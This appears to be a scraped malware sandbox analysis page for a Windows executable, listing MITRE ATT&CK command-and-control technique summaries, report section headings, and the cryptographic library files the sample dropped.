Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4Vp6Xc8SFr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_pkcs1_decode.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cast.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cbc.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cfb.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ctr.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_des3.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ecb.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_eksblowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ocb.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ofb.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2b.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_BLAKE2s.pyd

C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_MD2.pyd

Windows Analysis Report
4Vp6Xc8SFr.exe